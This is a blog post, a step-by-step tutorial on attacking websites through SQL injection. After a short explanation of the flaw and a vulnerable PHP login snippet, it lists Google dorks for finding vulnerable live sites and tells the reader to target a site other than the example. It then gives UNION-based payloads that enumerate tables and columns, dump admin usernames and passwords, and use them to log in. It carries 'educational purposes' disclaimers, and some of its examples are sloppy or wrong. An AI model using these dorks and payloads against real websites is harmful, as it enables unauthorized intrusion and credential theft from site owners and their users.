Thursday, 25 August 2016

Hacking website using SQL Injection -step by step guide

Before leaning how to exploit website with SQL Injection, let’s first to try learn the core methodologies and the abstraction behind the scenes.
What is SQL Injection?
SQL Injection is a malicious attack where malicious users can inject SQL commands (commonly referred to as malicious payload) in SQL statement that controls the web application database (commonly referred to as Relational Database Management System – RDBMS), within the web input field.

The SQL injection vulnerability can damage any website or web application that is currently using SQL-based database. This is one of the most dangerous web attack where the malicious users tend to exploit the web applications.

The malicious users can get unauthorized access to the web application, by making use of the SQL injection to bypass the authentication and authorization mechanism defined by any web application. This vulnerability in web applications give illegal access to the malicious user to modify, update or delete the database or make changes to any particular row and columns, in result the data integrity of SQL-based database should be affected.

How SQL Injection Works?
To exploit a web application, malicious users must have to find an input field that lies in the SQL query of the database.

In order for an SQL injection attack to take place, the vulnerable website needs direct user input in the SQL query that is injected in the SQL statement. In this way the malicious users inject a payload that is included in SQL query and hence it should be used to attack against the database server.

Before the actual attack, first check how the server responds to user’s input for authentication mechanism.
// define POST variables
$Uname = $_POST['name'];
 $Upassword = $_POST['password'];

// sql query vulnerable to SQLi
 $sql = "SELECT id from users where username = 'Uname' && password = 'Upassword' ";

// execute the sql query by database
database.execute($sql);
This was an example of how the user’s authentication credentials are checked or verified by the database server.

As shown the above code is vulnerable to SQL injection, the malicious user can gain access to the web application by submitting the malicious payload in the SQL query that would alter the SQL statement being executed by the database server.

A simple example of an SQL injection payload could be something as simple as setting the password field to
password’ OR '1'='1' 
where this condition is always true.

This would result in the following SQL query being run against the database server.
SELECT id FROM users WHERE username=’username’ AND password=’password’ OR 1=1’
What’s the worst an attacker can do with SQL?
SQL (Structured Query Language) is a programming language used to work with the databases, commonly Relational Database Management Systems are brought into work.

SQL language can be used to update, modify or delete the databases or the tables, columns, rows within RDBMS databases.

It is a powerful language to attack databases itself. Attackers can use this language to exploit databases of the web applications and take control of the application without the Administrator’s consent.

Keeping the above in mind, when considering the following, it’s easier to understand how lucrative a successful SQL injection attack can be for an attacker.

  • An attacker can use SQL injection to bypass authentication or even impersonate specific users.
  • SQL is used to delete records from a database. So an attacker could use an SQL injection vulnerability to delete data from a database. Even if an appropriate backup strategy is employed, deletion of data could affect an application’s availability until the database is restored.
  • One of SQL’s primary functions is to select data based on a query and output the result of that query. An SQL injection vulnerability could allow the complete disclosure of data residing on a database server.
  • Since web applications use SQL to alter data within a database, an attacker could use SQL injection to alter data stored in a database. Altering data affects data integrity and could cause repudiation issues, for instance, issues such as voiding transactions, altering balances and other records.
  • Some database servers are configured (intentional or otherwise) to allow arbitrary execution of operating system commands on the database server. Given the right conditions, an attacker could use SQL injection as the initial vector in an attack of an internal network that sits behind a firewall.
Practical Attack On Website With SQL Injection:
It will be easier to understand the exploitation of website using SQL injection, if you already have some idea about what all the SQL injection is. So let’s move on and search for a real hacking environment.

We will move on step by step to keep the simplicity in achieving our goals.

Step 1
Search for Google Dorks.

Following are some of the dorks, I just gathered. There are quite number of dorks you can search on your own.

inurl:”.php?cmd=”
inurl:”.php?z=”
inurl:”.php?q=”
inurl:”.php?search=”
inurl:”.php?query=”
inurl:”.php?searchstring=”
inurl:”.php?keyword=”
inurl:”.php?file=”
inurl:”.php?years=”
inurl:”.php?txt=”
inurl:”.php?tag=”
inurl:”.php?max=”
inurl:”.php?from=”
inurl:”.php?author=”
inurl:”.php?pass=”
inurl:”.php?feedback=”
inurl:”.php?mail=”
inurl:”.php?cat=”
inurl:”.php?vote=”
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=

These are some basic dorks but you can make your own custom dorks to find websites.

Using such dorks you can easily find which sites are vulnerable to SQL injection so you can bypass the authentication.

Step 2
Okay, if you got the vulnerable number of websites, just open one of them to check whether they are still possible for SQL injection.

In my case, I chose the following website for implementation of SQL injection.

www.xyz.com/products.php?id=2

Of course, it is random site. Make sure you choose some other website.

Note: This is just for educational Purpose. I’ve nothing to do with your actions.

Let’s check whether the website I have chosen is vulnerable to SQL injection or not.

So paste the link in the search bar with apostrophe (‘) in the end of link and press enter.

If we get the description like below after pressing enter, then it shows that the website is vulnerable to SQL injection.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
That’s good the website is vulnerable so move on. Follow the steps.

Step 3
Now its time to check how many columns the database of particular website has. Make an arbitrary attempt to check the number of columns.

www.xyz.com/products.php?id=2 order by 34–

Keep in mind you have to put the query in URL as it is, contrary to what you website link is. ‘Order by’ is the SQL command used to order the number of columns from the database. Here 34 is an arbitrary number, if we put this the following command is executed.
Unknown column '34' in 'order clause'
And if we put the link below in URL,

www.xyz.com/products.php?id=2 order by 33–

This works correctly we are redirected to the website home page.

So the number of columns in the database of particular website is 33.

Step 4
Use the following query.

http://www.xyz.com/products.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33–

Now this query show 12 which is bold displayed on the screen, so in the place of 12 you can write @@Version, that would give the version of SQL database used by the website.

http://www.xyz.com/products.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,@@Version,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33–

Step 5
Use the below query and focus I have wrote ‘group_concat(table_name)’ on the place of column#12 and some string in the last.

http://www.xyz.com/products.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from information_schema.tables where table_schema=database()–

Now this query give the names of database tables. Just copy them if you need it further in your scenario.

Step 6
Use the below query to find the column names in the database, by changing the table to column in the fields.
http://www.xyz.com/products.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,group_concat(column_name),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from information_schema.columns where table_schema=database()–

After entering the query we will get the column names of the different tables.

Step 7
In the previous step we got the column names so search for the column that is credential and should be used in retrieving sensitive data e.g username and password are the columns that could obviously give access to the database.

Use the following query:

http://www.xyz.com/products.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,group_concat(username,0x3a,password),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from admin–

In the group_concat() method we passed username then 0x3a which is used for space and then the other column name. In the end we removed the query and wrote from admin table, it means that we are using the column names from admin table.

Congratulations, you did it.

Search for the website login page and put the credentials in the fields.

Final Words:
First of all we searched for the Google dork, the vulnerable website.

Pasted apostrophe at the end of link to check if it it vulnerable.

Searched for the available number of columns.

Searched for the version of SQL database.

Searched for the table names.

Searched for the column names of all the tables.

Chosen the sensitive columns and fetched the sensitive data from them.

Searched for the login page of the website.

Used the hacked usernames and passwords for authentication mechanism.

Note: The tutorial was for educational purposes.

0 comments:

Post a Comment